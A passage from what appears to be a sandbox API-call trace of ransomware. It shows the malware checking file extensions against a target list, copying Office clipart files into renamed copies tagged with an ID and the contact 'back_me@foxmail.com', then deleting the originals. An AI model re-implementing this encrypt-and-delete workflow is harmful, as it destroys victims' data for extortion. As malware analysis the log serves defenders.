(lpString1=".1cd", lpString2=".GIF") returned -1 [0056.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.042] lstrlenW (lpString=".jpg") returned 4 [0056.042] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.043] lstrlenW (lpString=".doc") returned 4 [0056.043] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.043] lstrlenW (lpString=".docx") returned 5 [0056.043] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.043] lstrlenW (lpString=".pdf") returned 4 [0056.043] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString=".xls") returned 4 [0056.043] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString=".xlsx") returned 5 [0056.043] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.043] lstrlenW (lpString=".ppt") returned 4 [0056.043] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.043] lstrlenW (lpString=".zip") returned 4 [0056.043] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString=".rar") returned 4 [0056.043] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.043] lstrlenW (lpString=".bz2") returned 4 [0056.043] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.043] lstrlenW (lpString=".7z") returned 3 [0056.043] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.044] lstrlenW (lpString=".dbf") returned 4 [0056.044] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.044] lstrlenW (lpString=".1cd") returned 4 [0056.044] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.044] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0056.044] lstrlenW (lpString=".jpg") returned 4 [0056.044] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.044] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0056.044] lstrlenW (lpString="AN00932_.WMF") returned 12 [0056.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.270] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=14428) returned 1 [0056.270] CloseHandle (hObject=0x184) returned 1 [0056.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 0x20 [0056.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0056.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.283] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.283] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0056.283] GetLastError () returned 0x0 [0056.283] ReadFile (in: hFile=0x184, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x385c, lpOverlapped=0x0) returned 1 [0056.288] WriteFile (in: hFile=0x214, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x3860, lpOverlapped=0x0) returned 1 [0056.293] ReadFile (in: hFile=0x184, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.293] WriteFile (in: hFile=0x214, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.293] SetEndOfFile (hFile=0x214) returned 1 [0056.293] CloseHandle (hObject=0x214) returned 1 [0056.293] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.293] SetEndOfFile (hFile=0x184) returned 1 [0056.294] CloseHandle (hObject=0x184) returned 1 [0056.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.294] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0056.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.294] lstrlenW (lpString=".doc") returned 4 [0056.294] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.294] lstrlenW (lpString=".docx") returned 5 [0056.294] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.294] lstrlenW (lpString=".pdf") returned 4 [0056.294] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.294] lstrlenW (lpString=".xls") returned 4 [0056.295] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.295] lstrlenW (lpString=".xlsx") returned 5 [0056.295] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.295] lstrlenW (lpString=".ppt") returned 4 [0056.295] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.295] lstrlenW (lpString=".zip") returned 4 [0056.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.295] lstrlenW (lpString=".rar") returned 4 [0056.295] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.295] lstrlenW (lpString=".bz2") returned 4 [0056.295] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.295] lstrlenW (lpString=".7z") returned 3 [0056.295] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.295] lstrlenW (lpString=".dbf") returned 4 [0056.295] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.295] lstrlenW (lpString=".1cd") returned 4 [0056.295] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0056.295] lstrlenW (lpString=".jpg") returned 4 [0056.295] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.296] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.296] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.296] GetLastError () returned 0x0 [0056.296] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x66dc, lpOverlapped=0x0) returned 1 [0056.299] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x66e0, lpOverlapped=0x0) returned 1 [0056.300] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.300] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.300] SetEndOfFile (hFile=0x184) returned 1 [0056.300] CloseHandle (hObject=0x184) returned 1 [0056.300] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.301] SetEndOfFile (hFile=0x198) returned 1 [0056.301] CloseHandle (hObject=0x198) returned 1 [0056.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.302] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0056.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.302] lstrlenW (lpString=".doc") returned 4 [0056.302] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.302] lstrlenW (lpString=".docx") returned 5 [0056.302] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.302] lstrlenW (lpString=".pdf") returned 4 [0056.302] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.302] lstrlenW (lpString=".xls") returned 4 [0056.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.302] lstrlenW (lpString=".xlsx") returned 5 [0056.302] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.302] lstrlenW (lpString=".ppt") returned 4 [0056.302] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.302] lstrlenW (lpString=".zip") returned 4 [0056.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.302] lstrlenW (lpString=".rar") returned 4 [0056.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.302] lstrlenW (lpString=".bz2") returned 4 [0056.303] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.303] lstrlenW (lpString=".7z") returned 3 [0056.303] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.303] lstrlenW (lpString=".dbf") returned 4 [0056.303] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.303] lstrlenW (lpString=".1cd") returned 4 [0056.303] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0056.303] lstrlenW (lpString=".jpg") returned 4 [0056.303] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.303] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.303] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.304] GetLastError () returned 0x0 [0056.304] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x6cd2, lpOverlapped=0x0) returned 1 [0056.305] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x6ce0, lpOverlapped=0x0) returned 1 [0056.307] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.307] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.307] SetEndOfFile (hFile=0x184) returned 1 [0056.311] CloseHandle (hObject=0x184) returned 1 [0056.311] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.311] SetEndOfFile (hFile=0x198) returned 1 [0056.312] CloseHandle (hObject=0x198) returned 1 [0056.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0056.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.313] lstrlenW (lpString=".doc") returned 4 [0056.313] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.313] lstrlenW (lpString=".docx") returned 5 [0056.313] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.313] lstrlenW (lpString=".pdf") returned 4 [0056.313] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.313] lstrlenW (lpString=".xls") returned 4 [0056.313] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.313] lstrlenW (lpString=".xlsx") returned 5 [0056.313] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.313] lstrlenW (lpString=".ppt") returned 4 [0056.313] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.313] lstrlenW (lpString=".zip") returned 4 [0056.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.314] lstrlenW (lpString=".rar") returned 4 [0056.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.314] lstrlenW (lpString=".bz2") returned 4 [0056.314] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.314] lstrlenW (lpString=".7z") returned 3 [0056.314] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.314] lstrlenW (lpString=".dbf") returned 4 [0056.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.314] lstrlenW (lpString=".1cd") returned 4 [0056.314] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0056.314] lstrlenW (lpString=".jpg") returned 4 [0056.314] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.314] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.314] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.315] GetLastError () returned 0x0 [0056.315] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xea2, lpOverlapped=0x0) returned 1 [0056.316] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xeb0, lpOverlapped=0x0) returned 1 [0056.317] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.317] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.317] SetEndOfFile (hFile=0x184) returned 1 [0056.317] CloseHandle (hObject=0x184) returned 1 [0056.317] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.317] SetEndOfFile (hFile=0x198) returned 1 [0056.318] CloseHandle (hObject=0x198) returned 1 [0056.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0056.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.319] lstrlenW (lpString=".doc") returned 4 [0056.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.319] lstrlenW (lpString=".docx") returned 5 [0056.319] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.319] lstrlenW (lpString=".pdf") returned 4 [0056.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.319] lstrlenW (lpString=".xls") returned 4 [0056.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.319] lstrlenW (lpString=".xlsx") returned 5 [0056.319] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.319] lstrlenW (lpString=".ppt") returned 4 [0056.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.319] lstrlenW (lpString=".zip") returned 4 [0056.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.319] lstrlenW (lpString=".rar") returned 4 [0056.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.320] lstrlenW (lpString=".bz2") returned 4 [0056.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.320] lstrlenW (lpString=".7z") returned 3 [0056.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.320] lstrlenW (lpString=".dbf") returned 4 [0056.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.320] lstrlenW (lpString=".1cd") returned 4 [0056.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0056.320] lstrlenW (lpString=".jpg") returned 4 [0056.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.320] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.320] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0056.321] GetLastError () returned 0x0 [0056.321] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x16cc, lpOverlapped=0x0) returned 1 [0056.568] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x16d0, lpOverlapped=0x0) returned 1 [0056.569] ReadFile (in: hFile=0x198, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.569] WriteFile (in: hFile=0x184, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.569] SetEndOfFile (hFile=0x184) returned 1 [0056.570] CloseHandle (hObject=0x184) returned 1 [0056.570] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.570] SetEndOfFile (hFile=0x198) returned 1 [0056.571] CloseHandle (hObject=0x198) returned 1 [0056.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.571] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0056.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.571] lstrlenW (lpString=".doc") returned 4 [0056.571] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.571] lstrlenW (lpString=".docx") returned 5 [0056.572] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.572] lstrlenW (lpString=".pdf") returned 4 [0056.572] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString=".xls") returned 4 [0056.572] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.572] 